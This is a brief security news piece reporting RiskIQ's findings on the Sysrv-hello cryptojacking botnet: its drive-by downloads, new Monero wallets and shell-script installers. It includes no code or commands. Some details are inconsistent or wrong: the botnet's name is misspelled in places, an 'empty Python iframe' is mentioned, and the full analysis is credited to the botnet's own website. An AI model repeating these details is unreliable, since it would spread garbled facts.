Cryptojacking botnets are a profitable business, one which can earn millions by secretly stealing the CPUs of infected machines to mine cryptocurrencies.
Recently, RiskIQ research team described new capabilities of one such botnet, Sysv-hello.
The Sysv-hello botnet is a Windows and Linux infection first identified by Alibaba Cloud Security in late December 2020 that exploits multiple vulnerabilities and is deployed via shell scripts.
Like other threat actors, Sysv-hello’s operators constantly update and change the bot to keep up with their needs. Since 2020, there have been several changes in the shell scripts that install Sysrv-hello implant and how its executable gets deployed on host systems.
In their latest analysis, researchers from RiskIQ revealed that the botnet has added new features, such as the ability to use drive-by downloads and two Monero wallets.
This updated version of the botnet is deployed via drive-by-downloads from an empty Python iframe:
“In their latest threat intel analysis, RiskIQ researchers have described the botnet’s latest developments, including the use of drive-by downloads and two new Monero wallets,” the researchers wrote.
Operators mostly used shell scripts to install Sysrv-hello packages. The first shell scripting file could kill prior versions of Sysrv and other miners, and, since December 2020, remove Ali Baba (aka Aliyun) services.
There were additional files, which researchers didn’t manage to examine closely. But three out of the five additional files were flagged as Linux Coinminers on VirusTotal.
Recently, RiskIQ identified two more files that used extensive shell scripts on known Sysrv-hello servers:
“In April 2021, RiskIQ identified two more files on known Sysrv-hello C2 servers with much more extensive shell scripts than any previously observed, both used a wallet that had never been reported in opensource.”
The scripting files RiskIQ obtained contain both a Sysrv IP reported on by Juniper Networks, and a WatchDog domain reported on by Palo Alto. But researchers could not determine if there is any relationship between these two IOCs.
A full technical analysis is available on Sysrv-hello’s website.